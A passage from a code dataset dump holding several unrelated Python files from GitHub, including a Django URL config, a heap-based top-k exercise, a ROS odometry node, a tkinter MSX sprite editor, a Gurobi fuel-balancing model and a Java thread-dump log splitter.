cerrada\")\n#print(res)\n","repo_name":"saea98/analiza_llamadas","sub_path":"inicia_transcripcion.py","file_name":"inicia_transcripcion.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"72818993481","text":"import sys\nfrom global_chem import g\n\ngc = GlobalChem()\ngc.build_global_chem_network(print_output=False, debugger=False)\nnetwork = gc.network\nnetworkx_graph = cheminformatics.convert_to_networkx(network)\nprint (networkx_graph.nodes.data())\n\n\nimport networkx as nx\n\nfrom vispy import app, scene\nfrom vispy.visuals.graphs import layouts\n\n\ncanvas = scene.SceneCanvas(title='Simple NetworkX Graph', size=(600, 600),\n bgcolor='white', show=True)\nview = canvas.central_widget.add_view('panzoom')\n\ngraph = nx.adjacency_matrix(\n nx.fast_gnp_random_graph(500, 0.005, directed=True))\nlayout = layouts.get_layout('force_directed', iterations=100)\n\nvisual = scene.visuals.Graph(\n graph, layout=layout, line_color='black', arrow_type=\"stealth\",\n arrow_size=30, node_symbol=\"disc\", node_size=20,\n face_color=(1, 0, 0, 0.2), border_width=0.0, animate=True, directed=False,\n parent=view.scene)\n\n\n@canvas.events.draw.connect\ndef on_draw(event):\n if not visual.animate_layout():\n canvas.update()\n\nif __name__ == '__main__':\n if sys.flags.interactive != 1:\n app.run()\n","repo_name":"Global-Chem/global-chem","sub_path":"global_chem_extensions/global_chem_extensions/cheminformatics/applications/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":136,"dataset":"github-code","pt":"63"} +{"seq_id":"35363610595","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('channel//', views.channel_detail, name='channel_detail'),\n path('channel//videos/', views.channel_videos, name='channel_videos'),\n path('videos//', views.video_detail, name='video_detail'),\n path('videos//comments/', views.video_comments, name='video_comments'),\n path('channel//history/', views.channel_history, name='channel_history'),\n path('videos//history/', views.video_history, name='video_history'),\n]\n","repo_name":"npoptomov/youtube_app","sub_path":"backend/app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"18082587758","text":"import heapq\nfrom collections import Counter\nfrom itertools import chain\n\n\nclass Node:\n\n def __init__(self, val, freq):\n self.val = val\n self.freq = freq\n\n def __lt__(self, other):\n return self.freq > other.freq\n\n def __str__(self):\n return 'val = {}, freq = {}'.format(self.val, self.freq)\n\ndef topKFrequent(nums, k):\n\n \"\"\"\n Klogn solution using Heap.\n \"\"\"\n\n counts = Counter(nums)\n r = []\n o = []\n for key, count in counts.items():\n r.append(Node(key, count))\n\n heapq.heapify(r)\n while k:\n o.append(heapq.heappop(r).val)\n k = k - 1\n return o\n\n\n\ndef topKFrequentV2(nums, k):\n \"\"\"\n O(n) solution using approach of Buckets\n \"\"\"\n n = len(nums)\n bucket = [[] for _ in range(n)]\n for key, freq in Counter(nums).items():\n bucket[freq].append(key)\n return list(chain(*bucket))[-k:]\n\n\n# nums = [3, 2, 1, 4]\n# k = 2\n\nnums = [1,1,1,2,2,3]\nk = 3\n\n\n#\n# nums = [1]\n# k = 1\n\nprint(topKFrequent(nums, k))\nprint(topKFrequentV2(nums, k))\n\n","repo_name":"kaynaat007/mydspractice","sub_path":"ds/heap_questions/top_k_frequent_347.py","file_name":"top_k_frequent_347.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"24424418853","text":"#!/usr/bin/env python3\nimport rospy\nfrom odometry_hw.msg import Pose2D\nfrom odometry_hw.msg import DistWheel\nfrom math import sin,cos\n\nclass odometry:\n def __init__(self):\n rospy.Subscriber(\"/dist_wheel\", DistWheel, self.callback)\n self.pub = rospy.Publisher(\"/pose\", Pose2D, queue_size=10)\n self.x = 0\n self.y = 0\n self.theta = 0\n\n def callback(self, distance):\n pose = Pose2D()\n dist_right = distance.dist_wheel_right\n dist_left = distance.dist_wheel_left\n delta_s=(dist_right + dist_left) / 2\n delta_theta = (dist_right - dist_left) / 0.1\n delta_x = delta_s * cos (self.theta + (delta_theta/2))\n delta_y = delta_s * sin (self.theta + (delta_theta/2))\n self.x = self.x + delta_x\n self.y = self.y + delta_y\n self.theta = self.theta + delta_theta\n pose.x = self.x\n pose.y = self.y\n pose.theta = self.theta\n self.pub.publish(pose)\n\nif __name__ == '__main__':\n rospy.init_node('homework6' , anonymous=True)\n odometry()\n\n rospy.spin()\n","repo_name":"nayeyoni/nayeyoni-EECE5560","sub_path":"packages/odometry_package/src/homework6.py","file_name":"homework6.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"28287390592","text":"\"\"\"\r\nTo check if\r\nfetch_desc_bestbuy in FetchDescription\r\nworks properly\r\n\"\"\"\r\n\r\nfrom source.web_scrappers.FetchDescription import FetchDescription\r\nimport sys\r\nsys.path.append('./')\r\n\r\n\r\ndef test_fetch_description_bestbuy():\r\n link = \"https://www.bestbuy.com/site/dyson-outsize-total-clean-cordless-vacuum-nickel-red/6451332.p?skuId=6451332\"\r\n fd = FetchDescription(link)\r\n assert fd.fetch_desc_bestbuy() == \"dyson outsize total clean cordless vacuum nickel red\"\r\n\r\n\r\n\"\"\"\r\nlink = \"https://www.bestbuy.com/site/dyson-outsize-total-clean-cordless-vacuum-nickel-red/6451332.p?skuId=6451332\"\r\nfd = FetchDescription(link)\r\nprint(fd.fetch_desc_bestbuy())\r\n\"\"\"\r\n","repo_name":"piyush1prasad/proj2","sub_path":"test/test_fetch_desc_bestbuy.py","file_name":"test_fetch_desc_bestbuy.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"71063796041","text":"import tkinter as tk\r\nimport retrofunctions\r\nimport config\r\nimport retroclasses\r\nimport math\r\n\r\ndef findOrColor (csprites,app):\r\n # This function finds which is the best pixel to or according to the palette colors\r\n # This is used on MSX2 -> See https://www.msx.org/wiki/The_OR_Color\r\n numcols = len(csprites)\r\n c=[-1,-1,-1]\r\n pc=[-1,-1,-1,False]\r\n finalcolors = csprites[:]\r\n #Swap colors if orde color is in the list \r\n if numcols > 2:\r\n if csprites[0] in app.oredcolors:\r\n finalcolors[2]= csprites[0]\r\n finalcolors[1]= csprites[1]\r\n finalcolors[0]= csprites[2]\r\n elif csprites[1] in app.oredcolors:\r\n finalcolors[2] = csprites[1]\r\n finalcolors[0] = csprites[0]\r\n finalcolors[1] = csprites[2]\r\n if not int(finalcolors[0])|int(finalcolors[1])==int(finalcolors[2]):\r\n # I need to swap colors\r\n finalcolors = swapColors (app,finalcolors)\r\n if finalcolors == -1:\r\n return finalcolors\r\n if numcols < 5:\r\n # We need to split the sprite\r\n if numcols > 0:\r\n c[0]= int(finalcolors[0])\r\n if numcols > 1:\r\n c[1]= int(finalcolors[1])\r\n if numcols > 2:\r\n c[2]= int(finalcolors[2])\r\n pc[3] = True\r\n pc[0] = c[0]\r\n pc[1] = c[1]\r\n pc[2] = c[2]\r\n\r\n # find candidate for OR'ed color:\r\n if (c[0]|c[2]) == c[1]:\r\n pc[2] = c[1]\r\n pc[0] = c[0]\r\n pc[1] = c[2]\r\n if (c[1]|c[2]) == c[0]:\r\n pc[2] = c[0]\r\n pc[0] = c[1]\r\n pc[1] = c[2]\r\n return pc\r\n\r\ndef swapColors (app,colors):\r\n newcolor = int(colors[0])|int(colors[1])\r\n oldcolor = int(colors[2])\r\n if [oldcolor,newcolor] not in app.swappedTuples:\r\n changeSpriteColors (app,oldcolor,newcolor)\r\n colors[2]= str(newcolor)\r\n app.swappedTuples.append([oldcolor,newcolor])\r\n app.swappedTuples.append([newcolor,oldcolor])\r\n createTempSprites(app)\r\n createFinalSprites(app)\r\n return -1\r\n return colors\r\n\r\ndef changeSpriteColors (app,original,target):\r\n retrofunctions.exchangeColors (app,original,target)\r\n \r\ndef needToOr(csprites,app):\r\n #retruns if there is a need to or the colors or not\r\n toor = False;\r\n for cols in csprites:\r\n pc=findOrColor (cols,app)\r\n if pc == -1:\r\n return pc\r\n if pc[3]:\r\n toor = True\r\n return toor\r\n\r\ndef getSplits(csprites):\r\n #returns the number of sprites that have to be created as a result of the split\r\n \r\n \r\n splits = 0\r\n numcols = 0\r\n for cols in csprites:\r\n if numcols < len(cols):\r\n numcols = len(cols)\r\n if numcols > 0:\r\n splits = 1\r\n if numcols > 1:\r\n splits = 2\r\n if numcols > 2:\r\n splits = 2\r\n return splits\r\ndef createTempSprites (app):\r\n #Creates two arrays, uspritrs, which holds the pattern in colors (1,2,3....)\r\n #Csprites which holds the colors that are used in each line of the sprite\r\n if (app.spixels == []):\r\n retrofunctions.getPixels(app,app.spixels)\r\n app.usprites = []\r\n app.csprites = []\r\n app.spritescoords = []\r\n app.spritesPerRow = int(app.imgwidth/app.spritexsize)\r\n app.spritesPerCol = int(app.imgheight/app.spriteysize)\r\n for spy in range (0,app.spritesPerCol):\r\n for spx in range (0,app.spritesPerRow):\r\n thissprite = []\r\n thisspritecolors=[]\r\n for py in range (0,app.spriteysize):\r\n thiscolors = [] #Background is a must have as color\r\n srow =\"\" # Holds the scanned row of each sprite\r\n # Since color can be more than 1, we need a color indicator\r\n for px in range (0,app.spritexsize):\r\n\r\n #WIP\r\n position = ((spx*app.spritexsize)+px)+((app.spriteysize*app.imgwidth*spy)+(py*app.imgwidth))\r\n imgRow = int ((position)/app.imgwidth)+1\r\n extraRowUpper = imgRow+int(app.sprImgOffset/app.imgwidth)\r\n extraRowLower = imgRow+int(app.sprImgOffset/app.imgwidth)-1\r\n upperlimit = (app.imgwidth)*extraRowUpper\r\n lowerlimit = (app.imgwidth)*extraRowLower\r\n position = position + app.sprImgOffset\r\n ### We need to calculate the offset\r\n if ((position < len(app.spixels)) and (position >= 0) and (position < upperlimit) and (position >= lowerlimit)):\r\n color = str(app.spixels[position])\r\n else:\r\n color = \"0\"\r\n if (color not in thiscolors) and (int(color) != 0):\r\n thiscolors.append (color)\r\n srow = srow + \"%\" + color\r\n thissprite.append(srow)\r\n thisspritecolors.append(thiscolors)\r\n app.spritescoords.append ([spx,spy])\r\n app.usprites.append (thissprite)\r\n app.csprites.append (thisspritecolors)\r\n \r\ndef createFinalSprites(app):\r\n #create the deifnitive sprite patterns (0,1), and splits sprites that need to be ored\r\n app.finalsprites=[] \r\n myindex = 0\r\n tusprites = app.usprites[:]\r\n for usprite in tusprites:\r\n ored = False\r\n needtoor = needToOr(app.csprites[myindex],app)\r\n if needtoor == -1:\r\n break\r\n spritesplit = getSplits (app.csprites[myindex])\r\n for numsprites in range (0,spritesplit):\r\n tsprite =[]\r\n tcolor = []\r\n emptySprite = True\r\n for y in range (0,app.spriteysize):\r\n pc=findOrColor(app.csprites[myindex][y],app)\r\n oc=pc[2]\r\n trow = \"\";\r\n row = usprite[y]\r\n for x in range (0,app.spritexsize):\r\n pcolor = retrofunctions.getTempColor (row,x)\r\n if (int(pcolor)==int(pc[numsprites])) or (int(pcolor)==int(oc)):\r\n trow = trow+\"1\"\r\n emptySprite = False\r\n else:\r\n trow = trow+\"0\"\r\n tsprite.append(trow)\r\n if pc[numsprites]==-1:\r\n tcolor.append (0)\r\n else:\r\n tcolor.append (pc[numsprites])\r\n if not emptySprite:\r\n mysprite = retroclasses.sprite (tsprite,tcolor,ored,app.spritescoords[myindex][0],app.spritescoords[myindex][1]) ## X,Y Candidate (for BASIC EXPORT)\r\n app.finalsprites.append(mysprite)\r\n #print (len(app.finalsprites))\r\n if needtoor:\r\n ored = not ored\r\n myindex = myindex+1\r\ndef showSprites (app):\r\n #display the sprites grid, initializing everything first\r\n if hasattr(app.img,'filename'):\r\n if (app.img.filename == config.logoimage) and (app.spixels ==[]) and (app.tpixels==[]) :\r\n tk.messagebox.showinfo(\"Error\",\"Please, load an image or start a new project first\")\r\n return 1\r\n if set(app.bgcolor) == set((-1,-1,-1)) and (app.spixels ==[]) and (app.tpixels==[]):\r\n tk.messagebox.showinfo(\"Error\",\"Please, click on the background color of the image first\")\r\n return 1\r\n if (app.spwindow!=None):\r\n if (app.spritesCanvas != None) and (app.spwindow.winfo_exists()!=0): \r\n for child in app.spwindow.winfo_children():\r\n child.destroy()\r\n app.spritesCanvas = None\r\n else:\r\n createSpritesWindow(app)\r\n retrofunctions.displayPalette(app)\r\n else:\r\n createSpritesWindow(app)\r\n \r\n createTempSprites(app)\r\n if app.usprites != []:\r\n createFinalSprites(app)\r\n app.spwindow.deiconify()\r\n numSprites = len(app.usprites)\r\n if (app.imgwidth!=0):\r\n app.spritesPerRow = int(math.ceil(app.imgwidth/app.spritexsize))\r\n app.spritePerCol = int(math.ceil(numSprites/app.spritesPerRow))\r\n xsize = (app.spritexsize)*app.pixelsize\r\n ysize = (app.spriteysize)*app.pixelsize\r\n spacing = 4\r\n canvasWidth = app.spritesPerRow *(xsize+spacing)\r\n canvasHeight = app.spritePerCol*(ysize+spacing)\r\n shownSprites = 0\r\n app.spritesCanvas = tk.Canvas (app.spwindow,width=canvasWidth,height=canvasHeight,scrollregion=(0, 0, canvasWidth, canvasHeight))\r\n # Mous click actions left-> Put pixel, Right-> Remove pixel\r\n app.spritesCanvas.bind('', lambda x:updatePixel(app.spritesCanvas,True,app))\r\n #app.spritesCanvas.bind(\"\",lambda event: moveSpriteCanvas(app.spritesCanvas,x = event.x,y = event.y))\r\n app.spritesCanvas.bind('', lambda x:selectSprite(app.spritesCanvas,app))\r\n # Canvas by default does not get focus, so this means that if this is not set\r\n # key binding will not work!\r\n app.spritesCanvas.bind('', lambda event:moveSprites(event,app.spritesCanvas,app))\r\n\r\n if canvasWidth>config.appxsize:\r\n #add horizontal scroll\r\n xscrollbar = tk.Scrollbar(app.spwindow,orient=tk.HORIZONTAL)\r\n xscrollbar.pack (side=tk.BOTTOM, fill=tk.X)\r\n app.spritesCanvas.config(xscrollcommand=xscrollbar.set)\r\n xscrollbar.config(command=app.spritesCanvas.xview)\r\n if canvasHeight>config.appysize:\r\n #add vertical scroll\r\n yscrollbar = tk.Scrollbar(app.spwindow)\r\n yscrollbar.pack (side=tk.RIGHT, fill=tk.Y)\r\n app.spritesCanvas.config(yscrollcommand=yscrollbar.set)\r\n yscrollbar.config(command=app.spritesCanvas.yview)\r\n\r\n #Add scroll commands:\r\n\r\n app.spritesCanvas.pack()\r\n app.spritesCanvas.focus_set()\r\n currX = 1\r\n currY = 1\r\n currentSprite = 0\r\n for row in range (0,numSprites):\r\n destX = currX + (xsize)\r\n destY = currY + (ysize)\r\n tags = \"sprite,spr\"+str(currentSprite)+\"canvas\"\r\n app.spritesCanvas.create_rectangle(currX,currY,destX,destY,width=(spacing/2),tags=tags)\r\n #draw each \"boxel\" of the sprite\r\n retrofunctions.drawboxel (app,app.spritesCanvas,app.usprites[currentSprite],currX,currY,currentSprite,app.spritexsize,config.spriteeditorbgcolor,tags)\r\n currX = currX+(xsize+spacing)\r\n currentSprite = currentSprite + 1\r\n shownSprites = shownSprites + 1\r\n if shownSprites == app.spritesPerRow:\r\n currX = 1\r\n currY = currY + (ysize+spacing)\r\n shownSprites=0\r\n retrofunctions.displayPalette(app)\r\n # If canvas is bigger than screen then show scrollbars\r\n\r\ndef moveSpriteCanvas(canvas,x,y):\r\n print (\"moving\"+str(x)+\"//\"+str(y))\r\n \r\ndef moveSprites(event,canvas,app):\r\n \"\"\"\r\n Left 37\r\n Up\t 38\r\n Right 39\r\n Down 40\r\n \"\"\"\r\n if int(event.keycode) == 38:\r\n app.sprImgOffset = app.sprImgOffset + app.imgwidth\r\n if int(event.keycode) == 40:\r\n app.sprImgOffset = app.sprImgOffset - app.imgwidth\r\n if int(event.keycode) == 37:\r\n app.sprImgOffset = app.sprImgOffset +1\r\n if int(event.keycode) == 39:\r\n app.sprImgOffset = app.sprImgOffset -1\r\n app.usprites = []\r\n app.csprites = []\r\n createTempSprites (app)\r\n showSprites(app)\r\ndef selectSprite(canvas,app):\r\n print (canvas.gettags(\"sprite\"))\r\ndef updatePixel (canvas,switchon,app):\r\n fill = app.spriteeditorbgcolor\r\n tags = canvas.gettags(tk.CURRENT)\r\n if len(tags)<2:\r\n return\r\n if (switchon) and (app.drawColor != 0):\r\n fill = retrofunctions.transformColor(app,app.drawColor)\r\n\r\n if canvas.find_withtag(tk.CURRENT):\r\n canvas.itemconfig(tk.CURRENT, fill=fill)\r\n coords = tags[0].split('/')\r\n spriteidx = int(coords[0])\r\n px = int(coords[1])\r\n py = int(coords[2])\r\n sprite = app.usprites[spriteidx]\r\n row = sprite[py]\r\n row = retrofunctions.updateTempColor (row,px,app.drawColor)\r\n map(str,row)\r\n row = ''.join(row)\r\n sprite[py]=row\r\n app.usprites[spriteidx]=sprite\r\n \r\n # Update pixels object\r\n # need to convert sprite/pixel/pxpy \r\n # Tengo el spriteID, y las coordenadas del pixel en el sprite\r\n position = ((spriteidx*app.spritexsize)+px)+(py*app.imgwidth)\r\n app.spixels[position]=str(app.drawColor)\r\n canvas.update_idletasks()\r\n\r\ndef createSpritesWindow(app):\r\n #window to show the sprites in\r\n app.spwindow = tk.Toplevel(app.root)\r\n app.spwindow.title(\"Sprite Overview\")\r\n app.spwindow.iconbitmap(config.iconfile)\r\n app.spwindow.geometry(str(config.appxsize)+\"x\"+str(config.appysize))\r\n app.spwindow.protocol(\"WM_DELETE_WINDOW\", lambda:closeSpritesWindow(app))\r\n app.spwindow.withdraw()\r\n #scrollbar = tk.Scrollbar(app.spwindow, command=closeSprites(app))\r\n #scrollbar.pack(side=tk.RIGHT, fill='y')\r\n\r\ndef chgNbrSprites(value,app):\r\n app.newSprites = int(value.get())\r\n\r\ndef chgSprXSize(value,app):\r\n app.spritexsize = int(value.get())\r\n\r\ndef chgSprYSize(value,app):\r\n app.spriteysize = int(value.get())\r\n \r\ndef chgPixelSize(value,app):\r\n app.pixelsize = int(value.get())\r\n \r\n\r\ndef createAnimationWindow (app):\r\n app.animWindow = tk.Toplevel(app.root)\r\n app.animWindow.title(\"Character Animation\")\r\n app.animWindow.iconbitmap(config.iconfile)\r\n app.animWindow.geometry(str(config.animWxSize)+\"x\"+str(config.animWySize))\r\n app.animWindow.protocol(\"WM_DELETE_WINDOW\", lambda:retrofunctions.closeAnimationWindow(app))\r\n\r\n e = tk.Entry(app.animWindow)\r\n e.insert (0,app.animArray)\r\n w = tk.Entry(app.animWindow)\r\n w.insert (0,app.animCols)\r\n h = tk.Entry(app.animWindow)\r\n h.insert (0,app.animRows)\r\n b = tk.Button(app.animWindow, text=\"update sprites\",command = lambda:updateAnimation(app,e,w,h))\r\n e.pack()\r\n w.pack()\r\n h.pack()\r\n b.pack()\r\n \r\n \r\n \r\ndef updateAnimation(app,e,w,h):\r\n app.animArray = e.get().split(' ')\r\n app.animCols = int(w.get())\r\n app.animRows = int(h.get())\r\n \r\n animate (app)\r\n \r\n \r\ndef animate (app):\r\n if (app.csprites == []):\r\n tk.messagebox.showinfo(\"Error\",\"Please, create sprites before trying to animate them ;-)\")\r\n return 1\r\n \r\n app.animation = retroclasses.animation()\r\n \r\n for ch in app.animArray:\r\n ch =int(ch)\r\n character = retroclasses.character (app.animRows,app.animCols)\r\n for y in range (0,app.animRows):\r\n for x in range (0,app.animCols):\r\n #(MOD(ch;(ssr/animcol))*animcol)+(int(ch/(ssr/animcol))*animrows*ssr)+x+(y*ssr)\r\n\r\n idx = ( (ch % int(app.spritesPerRow/app.animCols))*app.animCols)+(int(ch/(app.spritesPerRow/app.animCols))*app.animRows*app.spritesPerRow)+x+(y*app.spritesPerRow)\r\n character.insertSprite(app.usprites[idx],y,x)\r\n app.animation.addCharacter(character)\r\n \r\n animWxSize = app.spritexsize*app.animCols*config.pixelsize\r\n animWySize = app.spriteysize*app.animRows*config.pixelsize\r\n \r\n if app.animWindow != \"\":\r\n app.animWindow.destroy()\r\n createAnimationWindow (app)\r\n app.animCanvas = tk.Canvas (app.animWindow,width=animWxSize,height=animWySize)\r\n app.animCanvas.bind('', lambda event:animateSprite(event,app))\r\n\r\n app.animCanvas.pack()\r\n app.animCanvas.focus_set()\r\n\r\n app.frame = 0\r\n animateSprite(None,app)\r\n\r\n\r\n\r\n\r\ndef animateSprite (event,app):\r\n if event != None:\r\n if int(event.keycode) == 37:\r\n app.frame = app.frame+1\r\n if int(event.keycode) == 39:\r\n app.frame = app.frame -1\r\n if app.frame >= app.animation.numFrames(): \r\n app.frame = 0\r\n if app.frame < 0 :\r\n app.frame = app.animation.numFrames()-1\r\n xsize = (app.spritexsize)*app.pixelsize\r\n ysize = (app.spriteysize)*app.pixelsize\r\n spacing = 2\r\n currX = 1\r\n currY = 1\r\n app.animCanvas.delete(\"all\")\r\n for row in range (app.animation.characters[app.frame].rows):\r\n for col in range (app.animation.characters[app.frame].cols):\r\n destX = currX + (xsize)\r\n destY = currY + (ysize)\r\n app.animCanvas.create_rectangle(currX,currY,destX,destY,width=(spacing/2))\r\n #draw each \"boxel\" of the sprite\r\n retrofunctions.drawboxel (app,app.animCanvas,app.animation.characters[app.frame].sprites[row][col],currX,currY,config.spriteeditorbgcolor,\"\")\r\n currX = currX+(xsize+spacing)\r\n currX = 1\r\n currY = currY + (ysize+spacing)\r\n app.animWindow.update()\r\n app.root.update()\r\n \r\ndef closeSpritesWindow(app):\r\n #Destroy sprite window so next time it is open it is reinitialized\r\n app.spwindow.destroy()\r\n","repo_name":"zayamatias/retrotool","sub_path":"sprites.py","file_name":"sprites.py","file_ext":"py","file_size_in_byte":16804,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"63"} +{"seq_id":"27065318210","text":"import pandas as pd\nimport numpy as np\nimport gurobipy as gp\nfrom gurobipy import GRB\n\noil_box_info_path = 'F:\\\\python_workspace\\\\2020F\\\\题目\\\\oil_box_info.xlsx'\noil_box_data = pd.read_excel(oil_box_info_path)\n\n\n# id:油箱编号0-5 v:当前油箱内油的体积 alpha:仰俯角(-90,90)角度 return:质心坐标\ndef calCentroid(id, v):\n oil_info = oil_box_data.iloc[id, :]\n centroid = [oil_info['x'], oil_info['y'], 0]\n s_input = v / oil_info['w']\n s_total = oil_info['l'] * oil_info['h']\n centroid[2] = oil_info['z'] - 0.5 * (s_total - s_input) / oil_info['l']\n return centroid\n\n\nq1_path = 'F:\\\\python_workspace\\\\2020F\\\\题目\\\\2020年F题--飞行器质心平衡供油策略优化\\\\附件3-问题2数据.xlsx'\nq1_data = pd.read_excel(q1_path)\nq2_data = pd.read_excel(q1_path, sheet_name='飞行器理想质心数据')\nU = [1.1, 1.8, 1.7, 1.5, 1.6, 1.1]\nN = q1_data.iloc[:, 1].tolist()\nC = np.array(q2_data.iloc[:, 1:4])\nV0 = [0.3, 1.5, 2.1, 1.9, 2.6, 0.8]\nVm = [0.405, 1.936, 2.376, 2.652, 2.88, 1.2]\n\nNN = np.cumsum(N)\n\n\n# v:list[6]当前时刻6个油箱内油的体积\ndef calTotalCentroid(v0, v1, v2, v3, v4, v5, t):\n #print(NN[1000])\n v = [v0, v1, v2, v3, v4, v5]\n oil_m = 850 * np.array(v)\n centroidList = []\n for i in range(6):\n centroidList.append(calCentroid(i, v[i]))\n #print(centroidList)\n s = [0, 0, 0]\n for i in range(6):\n for j in range(3):\n s[j] += oil_m[i] * centroidList[i][j]\n # return np.array(s / np.array(sum(oil_m) + 3000))\n #print(np.array(s / np.array(9.2 * 850 - NN[t] + 3000)))\n return np.array(s / np.array(9.2 * 850 - NN[t] + 3000))\n\n\n# a = [1, 2, 3]\n# b = [1, 2, 5]\n# print(sum((np.array(a) - np.array(b)) * (np.array(a) - np.array(b))))\n\nm = gp.Model(\"1\")\nw = m.addVars(6, 7200, vtype=GRB.BINARY)\nx = m.addVars(6, 7200, vtype=GRB.CONTINUOUS, lb=0)\nF = m.addVars(6, 7200, vtype=GRB.INTEGER, lb=0)\nv = m.addVars(6, 7200, vtype=GRB.CONTINUOUS, lb=0)\nz = m.addVar(vtype=GRB.CONTINUOUS, lb=0)\nerr = m.addVars(7200, 3, vtype=GRB.CONTINUOUS, lb=0)\n\nm.setObjective(z, GRB.MINIMIZE)\n# m.setObjective(\n# max(((calTotalCentroid(v[0, t], v[1, t], v[2, t], v[3, t], v[4, t], v[5, t], t) - C[t]) *\n# (calTotalCentroid(v[0, t], v[1, t], v[2, t], v[3, t], v[4, t], v[5, t], t) - C[t])).sum() for t in range(7200)), GRB.MINIMIZE)\n\nm.addConstrs(x[i, t] <= w[i, t] * U[i] for i in range(6) for t in range(7200))\nm.addConstrs(gp.quicksum(w[i, t] for i in range(1, 5)) <= 2 for t in range(7200))\nm.addConstrs(gp.quicksum(w[i, t] for i in range(6)) <= 3 for t in range(7200))\nm.addConstrs(x[i, t] >= N[t] for i in range(6) for t in range(7200))\nm.addConstrs(v[i, 0] == V0[i] for i in range(6))\nm.addConstrs(v[i, t] == v[i, t - 1] - x[i, t - 1] / 850 for i in [0, 2, 3, 5] for t in range(1, 7200))\nm.addConstrs(v[1, t] == v[1, t - 1] - x[1, t - 1] / 850 + x[0, t - 1] / 850 for t in range(1, 7200))\nm.addConstrs(v[4, t] == v[4, t - 1] - x[4, t - 1] / 850 + x[5, t - 1] / 850 for t in range(1, 7200))\nm.addConstrs(v[i, t] <= Vm[i] for i in range(6) for t in range(7200))\nm.addConstrs(F[i, t] == w[i, t] * (F[i, t - 1] + 1) for i in range(6) for t in range(1, 7200))\nm.addConstrs((F[i, t - 1] - 60) * (w[i, t - 1] - w[i, t]) >= 0 for i in range(6) for t in range(1, 7200))\n\nm.addConstrs(err[t, i] == list(calTotalCentroid(v[0, t], v[1, t], v[2, t], v[3, t], v[4, t], v[5, t], t) - C[t])[i] for i in range(3) for t in range(7200))\nm.addConstrs(\n np.array(err[t, 0]) * np.array(err[t, 0]) + np.array(err[t, 1]) * np.array(err[t, 1]) + np.array(err[t, 2]) * np.array(err[t, 2]) <= z\n for t in range(7200))\n# m.addConstrs(\n# sum((calTotalCentroid(v[0, t], v[1, t], v[2, t], v[3, t], v[4, t], v[5, t], t) - C[t]) *\n# (calTotalCentroid(v[0, t], v[1, t], v[2, t], v[3, t], v[4, t], v[5, t], t) - C[t])) <= z for t in range(7200))\n\nm.optimize()\n\n# a = calTotalCentroid(0, 0.1, 0.2, 0.3, 0.4, 0.3, 1) - C[1]\n# print(sum(a * a))\n","repo_name":"zsm982202/MechineLearning_python3","sub_path":"2020F/2_1.py","file_name":"2_1.py","file_ext":"py","file_size_in_byte":3937,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"29343734764","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\nimport os\nimport re\nimport stat\nimport sys\n\ntimestamp_text = '^\\d\\d\\d\\d-\\d\\d-\\d\\d \\d\\d:\\d\\d:\\d\\d$'\ntimestamp_pattern = re.compile(timestamp_text)\n\nclass LogSplitter:\n\n\t# Split by date\n\n\tdef split(self, foldername, filename):\n\n\t\t# Create the folder if it does not yet exist.\n\n\t\tif not os.path.exists(foldername):\n\t\t\tos.mkdir(foldername)\n\t\t\tos.chmod(foldername, stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)\n\n\t\tlines = open(filename, 'r')\n\n\t\t# Search for the date format emitted at the top of every\n\t\t# standard dump and continues searching until it sees two empty\n\t\t# lines in a row.\n\n\t\tthread_dump = False\n\t\tthread_dump_file = None\n\n\t\tlast_line_blank = False\n\t\tcounter = 0\n\n\t\tfor line in lines:\n\t\t\tline = line.rstrip()\n\n\t\t\t# If you are currently parsing a thread dump, then check\n\t\t\t# for an empty line.\n\n\t\t\t# If you have reached the beginning of a thread dump, flag\n\t\t\t# it as such and open a file. For simplicity, use a name\n\t\t\t# which matches the timestamp.\n\n\t\t\tif timestamp_pattern.match(line):\n\t\t\t\tif thread_dump:\n\t\t\t\t\tthread_dump_file.close()\n\t\t\t\telse:\n\t\t\t\t\tthread_dump = True\n\n\t\t\t\tlast_line_blank = False\n\n\t\t\t\tthread_dump_filename = os.path.join(\n\t\t\t\t\tfoldername, 'thread_' + re.sub('[^\\d]', '', line))\n\n\t\t\t\tthread_dump_file = open(thread_dump_filename, 'w')\n\n\t\t\telif last_line_blank and line.find('Full thread dump') == 0:\n\t\t\t\tcounter += 1\n\n\t\t\t\tif thread_dump:\n\t\t\t\t\tthread_dump_file.close()\n\t\t\t\telse:\n\t\t\t\t\tthread_dump = True\n\n\t\t\t\tlast_line_blank = False\n\n\t\t\t\tthread_dump_filename = os.path.join(\n\t\t\t\t\tfoldername, 'thread_%05d' % counter)\n\n\t\t\t\tthread_dump_file = open(thread_dump_filename, 'w')\n\n\t\t\telif thread_dump:\n\n\t\t\t\t# If the last line was also blank, you have just seen\n\t\t\t\t# two empty lines in a row so you have reached the end of\n\t\t\t\t# your thread dump. Otherwise, you've seen your first\n\t\t\t\t# blank line so you should track it.\n\n\t\t\t\tif len(line) == 0:\n\t\t\t\t\tif last_line_blank:\n\t\t\t\t\t\tthread_dump = False\n\t\t\t\t\t\tthread_dump_file.close()\n\t\t\t\t\telse:\n\t\t\t\t\t\tlast_line_blank = True\n\n\t\t\t\t# If you did not see an empty line, reset the flag for\n\t\t\t\t# tracking the last blank line.\n\n\t\t\t\telse:\n\t\t\t\t\tlast_line_blank = False\n\n\t\t\t# Write to the thread dump file if you've decided that you\n\t\t\t# are in the middle of parsing a thread dump.\n\n\t\t\tif thread_dump:\n\t\t\t\tthread_dump_file.write(line)\n\t\t\t\tthread_dump_file.write('\\n')\n\n\t\tif 